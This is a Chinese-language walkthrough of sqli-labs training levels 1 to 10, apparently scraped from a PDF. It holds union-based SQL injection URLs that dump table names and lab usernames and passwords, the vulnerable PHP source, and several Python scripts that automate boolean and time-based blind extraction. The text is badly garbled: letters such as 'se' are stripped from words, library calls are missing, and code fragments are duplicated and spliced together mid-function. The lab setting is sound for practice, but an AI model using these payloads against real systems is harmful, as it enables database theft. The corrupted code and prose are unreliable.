【靶场练习_sqli-labs】SQLi-LABSPage-1(BasicChallenges)
GET篇
Less-1:简单题
1.
⽤order by得出待查表⾥有三个字段
192.168.40.165/sqli-labs-master/Less-1/?id=1' order by 3--+
2.⽤union lect得到数据库名——curity
192.168.40.165/sqli-labs-master/Less-1/?id=-1' union lect 1,databa(),2--+
3.⽤lect group_concat(table_name) from information_s where table_schema=databa()得到数据表名——emails,referers,referers,uagents,urs
192.168.40.165/sqli-labs-master/Less-1/?id=-1' union lect 1,databa(),(lect group_concat(table_name) from information_s where
table_schema=databa())--+
4.⽤lect group_concat(column_name) from information_s where table_name='emails'得到数据表中的字段名——id,email_id
192.168.40.165/sqli-labs-master/Less-1/?id=-1' union lect 1,(lect group_concat(column_name) from information_s where
table_name='emails'),databa()--+
5.⽤lect group_concat(id,email_id) from emails 得到字段的值——
name:1Dumb@,2Angel@,3Dummy@,4cure@,5stupid@,6superman@,7batman@,8admin@dhakkan.c
192.168.40.165/sqli-labs-master/Less-1/?id=-1' union lect 1,(lect group_concat(id,email_id) from emails),databa()--+
less-2:简单题
在2⾥⾯"and"居然失效了,好迷啊,索性"order by"还可以⽤
有三列数据:
192.168.40.165/sqli-labs-master/Less-2/?id=1 order by 3--+
当前数据库:curity
192.168.40.165/sqli-labs-master/Less-2/?id=-1 union lect 1,databa(),3--+
curity⾥⾯的数据表:_emails,_emails,_referers,_referers,_referers,_uagents,_uagents,_uagents,_uagents,_urs,_urs,_urs
192.168.40.165/sqli-labs-master/Less-2/?id=-1 union lect 1,databa(),(lect group_concat('_',table_name) from information_s where table_schema=databa())--+
urs表⾥的字段:ur_id,first_name,last_name,ur,password,avatar,id,urname,password
192.168.40.165/sqli-labs-master/Less-2/?id=-1 union lect 1,databa(),(lect group_concat(column_name) from information_s where table_name='urs')--+
得到字段值:DumbDumb,AngelinaI-kill-
you,Dummyp@ssword,curecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4
192.168.40.165/sqli-labs-master/Less-2/?id=-1 union lect 1,(lect group_concat(urname,password) from urs),(lect group_concat(column_name) from
information_s where table_name='urs')--+
less-3:单引号+括号闭合
DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "/TR/xhtml1/DTD/"> <html xmlns="/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; chart=utf-8" /> <title>Less-3 Error Bad- String (with Twist) title> head> <body bgcolor="#000000"> <div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan font><br> <font size="3" color="#FFFF00"> <?php //including the Mysql connect parameters. include("../sql-connections/"); error_reporting(0); // take the variables if(ist($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis. $fp=fopen('','a'); fwrite($fp,'ID:'.$id."n"); fclo($fp); // connectivity $sql="SELECT * FROM urs WHERE id=('') LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo ""; echo 'Your Login name:'. $row['urname']; echo " echo 'Your Password:' .$row['password']; echo ""; } el { echo ''; print_r(mysql_error()); echo ""; } } el { echo "Plea input the ID as parameter with numeric value";} > font> div>br>br>br><center> <img src="../images/" />center> body> html> 源码 数据库:curity 192.168.40.165/sqli-labs-master/Less-3/ id=--1') union lect 1,2,databa() %23 数据表:emails,referers,uagents,urs 192.168.40.165/sqli-labs-master/Less-3/ id=--1') union lect 1,2,group_concat(table_name) from information_s where table_schema=databa() %23 列名:ur_id,first_name,last_name,ur,password,avatar,id,urname,password 192.168.40.165/sqli-labs-master/Less-3/ id=--1') union lect 1,2,group_concat(column_name) from information_s where table_name='urs' %23 字段值:Dumb,Angelina,Dummy,cure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4 192.168.40.165/sqli-labs-master/Less-3/ id=--1') union lect 1,2,group_concat(urname) from urs %23 less-4:双引号+括号闭合 双引号闭合:两条语句回显不同 id=1" and "0 id=1" and "1 括号闭合: u near 'union lect 1,2,3 #") LIMIT 0,1' at line 1 192.168.40.165/sqli-labs-master/Less-4/ id=1" union lect 1,2,3 %23 192.168.40.165/sqli-labs-master/Less-4/ id=1") union lect 1,2,3 %23 数据库:curity 192.168.40.165/sqli-labs-master/Less-4/ id=-1") union lect 1,databa(),2 %23 数据表:emails,referers,uagents,urs 192.168.40.165/sqli-labs-master/Less-4/ id=-1") union lect 1,group_concat(table_name),3 from information_ where table_schema=databa()%23 列名:ur_id,first_name,last_name,ur,password,avatar,id,urname,password 192.168.40.165/sqli-labs-master/Less-4/ id=-1") union lect 1,group_concat(column_name),3 from information_s where table_name='urs'%23 字段值:Dumb,Angelina,Dummy,cure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4 192.168.40.165/sqli-labs-master/Less-4/ id=-1") union lect 1,group_concat(urname),3 from urs%23 less-5:盲注单引号闭合,看到有的师傅说报错也可以做,有时间试试 这⾥补⼀个函数,⼀开始使⽤substr来切割,发现怎么写也不⾏,然后⽤的是left() LEFT(str,len) 返回最左边的n个字符的字符串str,或NULL如果任何参数是NULL。 SQL> SELECT LEFT('foobarbar', 5); +---------------------------------------------------------+ | LEFT('foobarbar', 5) | +---------------------------------------------------------+ | fooba | +---------------------------------------------------------+ 1 row in t (0.00 c) //原⽂出⾃【易百教程】,商业转载请联系作者获得授权,⾮商业转载请保留原⽂链接:/sql/ ''' @Modify Time @Author ------------ ------- 2019/9/29 13:26 laoalo ''' import requests from lxml import etree import time tag = "You " d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM," def databa_length(): ''' 数据库长度爆破 :return: 数据库长度 ''' global tag url = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and length(databa())=" i = 0 while True: urls = url + str(i) + '%23' respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment=htmlelmet[0] urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and left(databa(),"+str(j)+")='"+databa+i+"'--+" respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: databa += i break return databa def table_name_no_ascii(length): ''' 不⽤ascii的⽅法求表名,就直接遍历字典,等有空的时候完善 :param length: :return: ''' global d table="" for j in range(length+1): for i in d: urls="192.168.40.165/sqli-labs-master/Less-5/?id=1'and substr((lect table_name from information_ where table_schema=databa() limit 0,1),1,1)"+i+"--+" respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: table += i break return table def table_length(): ''' 计算当前数据库中所有的表的长 :return: 表长 ''' global tag i = 0 while True: urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and length((lect group_concat(table_name) from information_s where table_schema=databa()))=" + str(i) + "--+ respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def table_name(length): ''' ascii法爆破数据表 :return: 表长 ''' global tag table="" for j in range(length+1): ''' i 的往上增,直到超了 ''' i = 0 while i<=122: urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),"+str(j)+",1))< respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: break el: i+=10 ''' 此时i⾃减1开始定位名字 elment = htmlelmet[0] if elment == tag: return i el: i += 1 def column_name(length,table_name): ''' ascii法爆破字段 :return: 表长 ''' global tag table="" for j in range(length+1): ''' 10的往上增,直到超了 ''' i = 0 while i<=122: urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"'),"+str(j)+ respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: break el: i+=10 ''' 此时i⾃减1开始定位名字 ''' print("开始⾃减") while i>0: urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"'),"+str(j)+ respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: table +=chr(i) print('表名=',table) break el: i-=1 return table def data_length(colums,table): ''' 得到数据的长度 :param colums: 字段名 :param table: 表名 :return: 数据的长度 ''' global tag i = 0 while i < 1000: urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and length((lect group_concat("+colums+") from "+table+"))="+str(i) + "--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def data_datail(length,colums,table): ''' 得到数据表中的值 :param length: 值得长度 :param colums: 查询的字段名 :param table: 查询的表名 :return: 字段值 ''' global d data = "" for j in range(1,length+1): for i in d: urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and left((lect group_concat("+colums+") from "+table+"), "+str(j)+" )='"+data+i+"'--+" print(urls) respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: data += i print(colums,'字段值=',data) break ''' @Modify Time @Author ------------ ------- 2019/9/29 13:26 laoalo ''' import requests from lxml import etree import time tag = "You " d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM," def databa_length(): ''' 数据库长度爆破 :return: 数据库长度 ''' global tag url = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length(databa())=' i = 0 while True: urls = url + str(i) + '%23' respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment=htmlelmet[0] if elment == tag: return i el: i += 1 def databa_name(length): ''' 爆破数据库名 :param length: 数据库长度 :return: 数据库名 ''' global d databa="" for j in range(length+1): for i in d: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and left(databa(),'+str(j)+')="'+databa+i+'"--+' respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: databa += i break return databa def table_name_no_ascii(length): ''' 不⽤ascii的⽅法求表名,就直接遍历字典,等有空的时候完善 :param length: :return: ''' global d table="" for j in range(length+1): for i in d: urls='192.168.40.165/sqli-labs-master/Less-6/?id=1" and substr((lect table_name from information_ where table_schema=databa() limit 0,1),1,1)'+i+'--+' respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] ''' global tag i = 0 while True: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((lect group_concat(table_name) from information_s where table_schema=databa()))=' + str(i) + '--+' respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def table_name(length): ''' ascii法爆破数据表 :return: 表长 ''' global tag table = "" for j in range(length+1): ''' i 的往上增,直到超了 ''' i = 0 while i <= 122: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),'+str(j)+',1))< respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: break el: i+=10 ''' 此时i⾃减1开始定位名字 ''' print("开始⾃减",end="") while i>0: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),'+str(j)+',1))= respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: table +=chr(i) print('表名=',table) break el: i-=1 return table def colums_length(table_name): ''' 查询指定表的字段值 :param table_name: 表名 :return: ''' global tag i = 0 while i<1000: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((lect group_concat(column_name) from information_s where table_name="'+table_name+'"))=' + str(i) + respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: table +=chr(i) print('表名=',table) break el: i-=1 return table def data_length(colums,table): ''' 得到数据的长度 :param colums: 字段名 :param table: 表名 :return: 数据的长度 ''' global tag i = 0 while i < 1000: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((lect group_concat('+colums+') from '+table+'))='+str(i) + '--+' respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def data_datail(length,colums,table): ''' 得到数据表中的值 :param length: 值得长度 :param colums: 查询的字段名 :param table: 查询的表名 :return: 字段值 ''' global d data = "" for j in range(1,length+1): for i in d: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and left((lect group_concat('+colums+') from '+table+'), '+str(j)+' )="'+data+i+'"--+' print(urls) respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: data += i print(colums,'字段值=',data) break print(data) if __name__ == '__main__': # print(databa_length()) #8 # print(databa_name(8)) #curity # print(table_length()) #90 # print(table_name(90)) #emails,referers,uagents,urs # print(colums_length('emails')) #11 # print(column_name(11,'emails')) #id,email_id # print(data_length('id','emails')) #15 print(data_datail(15,'id','emails')) #id 字段值= 1,2,3,4,5,6,7,8 盲注脚本 Less-7:⽂件上传 id=0 union lect 1,@@datadir,@@badir MYSQL--+ id=1')) union lect 1,2,' PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "/TR/xhtml1/DTD/"> <?php //including the Mysql connect parameters. include("../sql-connections/"); error_reporting(0); // take the variables if(ist($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis. $fp=fopen('','a'); fwrite($fp,'ID:'.$id."n"); fclo($fp); // connectivity $sql="SELECT * FROM urs WHERE id=(('$id')) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo ''; echo 'You '; echo " echo ""; } el { echo ''; echo 'You have an error in your SQL syntax'; //print_r(mysql_error()); echo ""; } } el { echo "Plea input the ID as parameter with numeric value";} > 源码 Your Login name:/var/lib/mysql/ Your Password:/usr/ 1、badir 参数 解释:该参数指定了安装 MySQL 的安装路径,填写全路径可以解决相对路径所造成的问题。 例如:badir="E:/dev/MySQL/MySQL Server 5.2/"表⽰我的 MySQL 安装在 E:/dev/MySQL/MySQL Server 5.2/ 路径下。 2、datadir 参数 解释:该参数指定了 MySQL 的数据库⽂件放在什么路径下。数据库⽂件即我们常说的 MySQL data ⽂件。 例如:datadir="E:/dev/MySQL/MySQL Server 5.2/Data/"则表⽰我的 MySQL 数据库⽂件放在 E:/dev/MySQL/MySQL Server 5.2/Data/ 路径下。 Less-8:单引号闭合的回显盲注 判断条件: 单引号: id=1' and '1 id=1' and '0 这次实验的是usrs表中的password,发现直接遍历会出现⼤⼩写不敏感的错误,⼜写了⼀个ascii版本,可以区分⼤⼩写,后来查资料才知道,有可能是sql不区分⼤⼩写导致 的 ''' @Modify Time @Author ------------ ------- 2019/10/4 10:21 laoalo ''' import requests from lxml import etree import time tag = "You " d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,-@!" def databa_length(): ''' 数据库长度爆破 :return: 数据库长度 ''' global tag url = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length(databa())=" i = 0 while True: urls = url + str(i) + '%23' respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment=htmlelmet[0] if elment == tag: return i el: i += 1 def databa_name(length): ''' 爆破数据库名 :param length: 数据库长度 :return: 数据库名 ''' global d databa="" for j in range(length+1): for i in d: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and left(databa(),"+str(j)+")='"+databa+i+"'--+" respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: databa += i break return databa def table_name_no_ascii(length): ''' 不⽤ascii的⽅法求表名,就直接遍历字典,等有空的时候完善 :param length: :return: ''' global d table="" for j in range(length+1): for i in d: urls="192.168.40.165/sqli-labs-master/Less-8/?id=1'and substr((lect table_name from information_ where table_schema=databa() limit 0,1),1,1)"+i+"--+" respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: table += i break return table def table_length(): ''' 计算当前数据库中所有的表的长 :return: 表长 ''' global tag i = 0 while True: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((lect group_concat(table_name) from information_s where table_schema=databa()))=" + str(i) + "--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return table def colums_length(table_name): ''' 查询指定表的字段值 :param table_name: 表名 :return: ''' global tag i = 0 while i<1000: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((lect group_concat(column_name) from information_s where table_name='"+table_name+"'))=" + str(i) + "--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def column_name(length,table_name): ''' ascii法爆破字段 :return: 表长 ''' global tag table="" for j in range(length+1): ''' 10的往上增,直到超了 ''' i = 0 while i<=122: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"'),"+str(j)+",1))<" + str(i) + "--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: break el: i+=10 ''' 此时i⾃减1开始定位名字 ''' print("开始⾃减") while i>0: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"'),"+str(j)+",1))=" +str(i) + "--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: table +=chr(i) print('表名=',table) break el: i-=1 return table if __name__ == '__main__': # print(table_length()) #90 # print(table_name(90)) #emails,referers,uagents,urs # print(colums_length('urs')) #70 # print(column_name(70,'urs')) #ur_id,first_name,last_name,ur,password,avatar,id,urname,password,ur_id,first_name,last_name,ur,password,avatar,id,urname,password # print(data_length('password','urs'))#96 print(data_datail(96,'password','urs'))#dumb,i-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4dumb,i-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,ad 全⼩写版 ''' @Modify Time @Author ------------ ------- 2019/10/4 10:21 laoalo ''' import requests from lxml import etree import time tag = "You " d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,-@!" def databa_length(): ''' 数据库长度爆破 :return: 数据库长度 ''' global tag url = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length(databa())=" i = 0 while True: urls = url + str(i) + '%23' respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment=htmlelmet[0] if elment == tag: return i el: i += 1 def databa_name(length): ''' 爆破数据库名 :param length: 数据库长度 :return: 数据库名 ''' global d databa="" for j in range(length+1): for i in d: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and left(databa(),"+str(j)+")='"+databa+i+"'--+" respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: databa += i break return databa def table_name_no_ascii(length): ''' 不⽤ascii的⽅法求表名,就直接遍历字典,等有空的时候完善 :param length: :return: ''' global d table="" for j in range(length+1): for i in d: urls="192.168.40.165/sqli-labs-master/Less-8/?id=1'and substr((lect table_name from information_ where table_schema=databa() limit 0,1),1,1)"+i+"--+" respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) table="" for j in range(length+1): ''' i 的往上增,直到超了 ''' i = 0 while i<=122: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),"+str(j)+",1))< respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: break el: i+=10 ''' 此时i⾃减1开始定位名字 ''' print("开始⾃减") while i>0: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),"+str(j)+",1))= respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: table +=chr(i) print('表名=',table) break el: i-=1 return table def colums_length(table_name): ''' 查询指定表的字段值 :param table_name: 表名 :return: ''' global tag i = 0 while i<1000: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((lect group_concat(column_name) from information_s where table_name='"+table_name+"'))=" + str(i) + respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def column_name(length,table_name): ''' ascii法爆破字段 :return: 表长 ''' global tag table="" for j in range(length+1): ''' 10的往上增,直到超了 ''' i = 0 global tag i = 0 while i < 1000: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((lect group_concat("+colums+") from "+table+"))="+str(i) + "--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def data_datail(length,colums,table): ''' 得到数据表中的值 :param length: 值得长度 :param colums: 查询的字段名 :param table: 查询的表名 :return: 字段值 ''' global d data = "" for j in range(1,length+1): for i in range(32,128): urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substring((lect group_concat("+colums+") from "+table+"),"+str(j)+",1))="+str(i)+"--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: data += chr(i) print(colums,'字段值=',data) break # print(data) if __name__ == '__main__': # print(table_length()) # print(table_name(90)) # print(colums_length('urs')) # print(column_name(70,'urs')) # print(data_length('password','urs')) print(data_datail(96,'password','urs')) 正确版 Less-9:时间盲注+单引号闭合 单引号+时间盲注: id=1' and sleep(3)--+ 1 ''' 2 @Modify Time @Author 3 ------------ ------- 4 2019/10/2 20:04 laoalo 5 ''' 6 # -*- coding:utf-8 -*- 7 import requests 8 import time 9 10 url = "192.168.40.165/sqli-labs-master/Less-9/?id=1'" 11 def databa_length(): 12 global url 13 for i in range(1,10000): 14 sql = url + " and if((lect length(databa()))>"+str(i)+",0,sleep(3)) +--+" 15 s_time = () 16 respon = (url=sql,timeout=3) 17 e_time = () 18 print(sql) 19 if(e_time-s_time) > 3: 20 print("数据库长:",i) 21 break 22 def databa_name(databa_length): 23 global url 24 sql = url + " and if(ascii(substr((lect databa()),{num},1))>{asc},0,sleep(3)) +--+" 25 db_name = '' 26 for num in range(1, databa_length+1): 27 for asc in range(ord('a'), ord('z') + 1): 28 s_time = () 29 ((num=num, asc=asc)) 30 e_time = () 31 if (e_time - s_time) > 3: 32 db_name += chr(asc) 33 print("数据库名:",db_name) 34 break 35 def table_length(databa_name): 36 global url 37 for i in range(1, 10000): 38 sql = url + " and if((lect length((lect group_concat(table_name) from information_ where table_schema='"+databa_name+"')))>" + str(i) + ",0,sleep(3)) +--+" 39 s_time = () 40 respon = (url=sql, timeout=3) 41 e_time = () 42 print(sql) 43 if (e_time - s_time) > 3: 44 print(databa_name,"中的所有数据表名长:", i) 45 break 46 def table_name(table_length,databa_name): 47 global url 48 sql = url + " and if(ascii(substr((lect group_concat(table_name parator '@') from information_ where table_schema='"+databa_name+"'),{num},1))>{asc},0,sleep(3)) +--+" 49 table_name = '' 50 for num in range(1, table_length + 1): 51 for asc in range(32, 128): 52 s_time = () 53 ((num=num, asc=asc)) 54 e_time = () 55 if (e_time - s_time) > 3: 56 table_name += chr(asc) 57 print("所有的数据表名:", table_name) 58 break 59 def column_length(table_name,databa_name): 60 global url 61 for i in range(1, 10000): 62 sql = url + " and if((lect length((lect group_concat(column_name) from information_s where table_name='" + table_name + "' and table_schema='"+databa_name+"')))> 63 s_time = () 64 (url=sql, timeout=3) 65 e_time = () 66 # print(sql) 67 if (e_time - s_time) > 3: 68 print(table_name, "中的所有字段名长:", i) 69 break 70 def column_name(column_length,table_name,databa_name): 71 global url 72 sql = url + " and if(ascii(substr((lect group_concat(column_name parator '@') from information_s where table_name='" + table_name + "' and table_schema='"+databa_name+ 73 table_name = '' 74 for num in range(1, column_length + 1): 75 for asc in range(32, 128): 76 s_time = () 77 ((num=num, asc=asc)) 78 e_time = () 79 if (e_time - s_time) > 3: 80 table_name += chr(asc) 81 print("所有的数据表名:", table_name) 82 break 83 def data_length(column_name,table_name): 84 global url 85 for i in range(1, 10000): 86 sql = url + " and if((lect length((lect group_concat("+column_name+" parator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+" 87 s_time = () 88 (url=sql, timeout=3) 89 e_time = () 90 # print(sql) 91 if (e_time - s_time) > 3: 92 print(column_name, "字段的值长:", i) 93 break 94 def data_detail(data_length,column_name,table_name): 95 global url 96 sql = url + " and if(ascii(substr((lect group_concat("+column_name+" parator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+" 97 data = '' 98 for num in range(1, data_length + 1): 99 for asc in range(32, 128): 100 s_time = () 101 ((num=num, asc=asc)) 102 e_time = () 103 if (e_time - s_time) > 3: 104 data += chr(asc) 105 print(column_name,"字段的值:", data) 106 break 107 if __name__ == '__main__': 108 # databa_length() # 8 109 # databa_name(8) #curity 110 # table_length('curity')#curity 中的所有数据表名长: 29 111 # table_name(29, 'curity')#所有的数据表名: emails@referers@uagents@urs 112 # column_length('urs','curity') #20 113 # column_name(20,'urs','curity')#所有的数据表名: id@urname@password 114 # data_length('urname', 'urs')#91 115 data_detail(91, 'urname', 'urs')#urname 字段的值: Dumb@Angelina@Dummy@cure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4 脚本 Less-10:时间盲注+双引号闭合 双引号+时间盲注 id=1" and sleep(3)--+ 1 ''' 2 @Modify Time @Author 3 ------------ ------- 4 2019/10/2 16:56 laoalo 5 ''' 6 # -*- coding:utf-8 -*- 7 import requests 8 import time 9 10 url = '192.168.40.165/sqli-labs-master/Less-10/?id=1"' 11 def databa_length(): 12 global url 13 for i in range(1,10000): 14 sql = url + " and if((lect length(databa()))>"+str(i)+",0,sleep(3)) +--+" 15 s_time = () 16 respon = (url=sql,timeout=3) 17 e_time = () 18 print(sql) 19 if(e_time-s_time) > 3: 20 print("数据库长:",i) 21 break 22 def databa_name(databa_length): 23 global url 24 sql = url + " and if(ascii(substr((lect databa()),{num},1))>{asc},0,sleep(3)) +--+" 25 db_name = '' 26 for num in range(1, databa_length+1): 27 for asc in range(ord('a'), ord('z') + 1): 28 s_time = () 29 ((num=num, asc=asc)) 30 e_time = () 31 if (e_time - s_time) > 3: 32 db_name += chr(asc) 33 print("数据库名:",db_name) 34 break 35 def table_length(databa_name): 36 global url 37 for i in range(1, 10000): 38 sql = url + " and if((lect length((lect group_concat(table_name) from information_ where table_schema='"+databa_name+"')))>" + str(i) + ",0,sleep(3)) +--+" 39 s_time = () 40 respon = (url=sql, timeout=3) 41 e_time = () 42 print(sql) 43 if (e_time - s_time) > 3: 44 print(databa_name,"中的所有数据表名长:", i) 45 break 46 def table_name(table_length,databa_name): 47 global url 48 sql = url + " and if(ascii(substr((lect group_concat(table_name parator '@') from information_ where table_schema='"+databa_name+"'),{num},1))>{asc},0,sleep(3)) +--+" 49 table_name = '' 50 for num in range(1, table_length + 1): 51 for asc in range(32, 128): 52 s_time = () 53 ((num=num, asc=asc)) 54 e_time = () 55 if (e_time - s_time) > 3: 56 table_name += chr(asc) 57 print("所有的数据表名:", table_name) 58 break 59 def column_length(table_name,databa_name): 60 global url 61 for i in range(1, 10000): 62 sql = url + " and if((lect length((lect group_concat(column_name) from information_s where table_name='" + table_name + "' and table_schema='"+databa_name+"')))> 63 s_time = () 64 (url=sql, timeout=3) 65 e_time = () 66 # print(sql) 67 if (e_time - s_time) > 3: 68 print(table_name, "中的所有字段名长:", i) 69 break 70 def column_name(column_length,table_name,databa_name): 71 global url 72 sql = url + " and if(ascii(substr((lect group_concat(column_name parator '@') from information_s where table_name='" + table_name + "' and table_schema='"+databa_name+ 73 table_name = '' 74 for num in range(1, column_length + 1): 75 for asc in range(32, 128): 76 s_time = () 77 ((num=num, asc=asc)) 78 e_time = () 79 if (e_time - s_time) > 3: 80 table_name += chr(asc) 81 print("所有的数据表名:", table_name) 82 break 83 def data_length(column_name,table_name): 84 global url 85 for i in range(1, 10000): 86 sql = url + " and if((lect length((lect group_concat("+column_name+" parator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+" 87 s_time = () 88 (url=sql, timeout=3) 89 e_time = () 90 # print(sql) 91 if (e_time - s_time) > 3: 92 print(column_name, "字段的值长:", i) 93 break 94 def data_detail(data_length,column_name,table_name): 95 global url 96 sql = url + " and if(ascii(substr((lect group_concat("+column_name+" parator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) 